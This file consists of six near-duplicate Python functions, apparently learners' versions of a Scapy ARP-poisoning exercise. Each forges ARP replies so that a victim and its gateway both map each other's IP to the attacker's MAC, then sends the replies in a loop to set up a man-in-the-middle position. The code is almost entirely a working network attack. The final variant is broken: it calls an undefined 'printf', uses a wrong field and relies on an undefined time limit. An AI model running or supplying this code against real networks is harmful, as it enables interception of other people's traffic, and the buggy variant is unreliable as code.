def poison(self):
# 1) Setting-up/initializing details of victim. Will run/send packets later, in step 3.
# poison_victim is my variable but it takes on the FUNCTION ARP()
poison_victim = ARP()
poison_victim.op = 2 # Question. ( the other op we saw was op='who-is')
# I determine the SOURCE IP of the packet, as the gateway !! - Sneaky
poison_victim.psrc = self.gateway # why preceded by 'p' in pdst and psrc ??
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victimmac
print(
f'ip src: {poison_victim.psrc} (ie the gateway - not my machine!')
print(f'ip dst: {poison_victim.pdst}')
print(f'mac dst: {poison_victim.hwdst}')
print(f'mac src: {poison_victim.hwsrc}'
) # Question: shouldn't this be set - it was not set yet.
print(poison_victim.summary())
print('-' * 30)
# 2) Setting-up/initializing details of gateway. Will run/send packets later, in step 3.
poison_gateway = ARP()
poison_gateway.op = 2 # Question. ( the other op we saw was op='who-is')
# I determine the SOURCE of the packet, as the victim/target !! - Sneaky
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(f'ip src: {poison_gateway.psrc}')
print(f'ip dst: {poison_gateway.pdst}')
print(f'mac dst: {poison_gateway.hwdst}')
print(f'mac_src: {poison_gateway.hwsrc}')
print(poison_gateway.summary())
print('-' * 30)
# 3)
print(
f'Beginning the ARP poison (ie sending the packets).Ffor 45 seconds.'
)
t_end = time.time() + 45 # 45 seconds
while time.time() < t_end:
#while True: # keep running the poison all the while we need to eavesdrop - until KeyboardInterrupt of ^C
sys.stdout.write(str(time.strftime("%H:%M:%S")) + "~")
sys.stdout.flush()
#try:
send(poison_victim)
send(poison_gateway)
# 4)
# except KeyboardInterrupt:
# self.restore()
# sys.exit()
# print('Performed "sys.exit()"')
#else:
time.sleep(2)
self.restore()
def poison(self):
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victimmac
print(f'ip src: {poison_victim.psrc}')
print(f'ip dst: {poison_victim.pdst}')
print(f'mac dst: {poison_victim.hwdst}')
print(f'mac src: {poison_victim.hwsrc}')
print('-' * 30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(f'ip src: {poison_gateway.psrc}')
print(f'ip dst: {poison_gateway.pdst}')
print(f'mac dst: {poison_gateway.hwdst}')
print(f'mac src: {poison_gateway.hwsrc}')
print(poison_gateway.summary())
print('-' * 30)
print(f'Beginning the ARP posion. [Ctrl-c to stop]')
while True:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(2)
def poison(self):
'''Create poisoned packets and send them to the victim and the gateway'''
poison_victim = ARP()
poison_victim.op = 2 # ARP Reply
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victimmac
print(f'Gateway, IP source: {poison_victim.psrc}'
) # Gateway's IP address
print(f'Victim, IP destiantion: {poison_victim.pdst}')
print(f'ATTACKER, MAC source: {poison_victim.hwsrc}'
) # Attacker's MAC address
print(f'Victim, MAC destination: {poison_victim.hwdst}')
print(poison_victim.summary())
print('~*~' * 15)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(f'Victim, IP source: {poison_gateway.psrc}'
) # Victim's IP address
print(f'Gateway, IP destiantion: {poison_gateway.pdst}')
print(f'ATTACKER, MAC source: {poison_gateway.hwsrc}'
) # Attacker's MAC address
print(f'Gateway, MAC destination: {poison_gateway.hwdst}')
print(poison_gateway.summary())
print('><(((º> ' * 15)
print(f'Begin the ARP poison. [CTRL-C to stop]')
# Respective's ARP caches entires remain posioned
while True:
# Dynamic packet printing:
sys.stdout.write('.') # Waiting on the terminal
sys.stdout.flush(
) # Flushes out the stdout buffer: it'll write everything in the buffer to the terminal
try:
# Attacker's NIC should allow IP Forwarding
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
# Restore ARP cache entires
self.restore()
sys.exit()
else:
time.sleep(2)
def poison(self):
"""
simple ARP poisoner.
- sets data up to poison victim and the gateway.
- first creates a poisoned ARP packet for the victim.
- second creates a poisoned ARP packet for the gateway.
- poisons the gateway by sending it to the victims IP address
but uses the attacker's MAC address.
- poisons the victim by sending the gateways IP address
but the attacker's MAC address.
[!] this program loops all of the above until the user cancels. [!]
[*] to stop loop CTRL-C [*]
"""
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victim_mac
print(f'IP src: {poison_victim.psrc}')
print(f'IP dst: {poison_victim.pdst}')
print(f'MAC dst: {poison_victim.hwdst}')
print(f'MAC src: {poison_victim.hwsrc}')
print(poison_victim.summary())
print('-'*30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gateway_mac
print(poison_gateway.summary())
print('-'*30)
print(f'Beginning the ARP poison. [CTRL-C to stop]')
while True:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(2)
def poison(self):
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway_ip
poison_victim.pdst = self.victim_ip
poison_victim.hwdst = self.victim_mac
print(f'IP source: {poison_victim.psrc}')
print(f'MAC source: {poison_victim.hwsrc}')
print(f'IP destination: {poison_victim.pdst}')
print(f'MAC destination: {poison_victim.hwdst}')
print(poison_victim.summary())
print('-' * 30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.victim_ip
poison_gateway.pdst = self.gateway_ip
poison_gateway.hwdst = self.gateway_mac
print(f'IP source: {poison_gateway.psrc}')
print(f'MAC source: {poison_gateway.hwsrc}')
print(f'IP destination: {poison_gateway.pdst}')
print(f'MAC destination: {poison_gateway.hwdst}')
print(poison_gateway.summary())
print('-' * 30)
print('Beginning the ARP poison. [CTRL-C to stop]')
while True:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(2)
def poison(self):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = self.gateway
poison_target.pdst = self.target
poison_target.hwdst = self.target_mac
printf(f'IP Src: {poison_target.psrc}')
printf(f'IP Dst: {poison_target.dst}')
printf(f'MAC Dst: {poison_target.hwdst}')
printf(f'MAC Src: {poison_target.hwsrc}')
print(poison_target.summary())
print('-' * 30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self.target
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gateway_mac
printf(f'IP Src: {poison_gateway.psrc}')
printf(f'IP Dst: {poison_gateway.dst}')
printf(f'MAC Dst: {poison_gateway.hwdst}')
printf(f'MAC Src: {poison_gateway.hwsrc}')
print(poison_gateway.summary())
print('-' * 30)
print(f'Beginning ARP Poison. [Press Ctrl-C to stop]')
while time.time() < TIME_LIMIT:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_target)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(2)
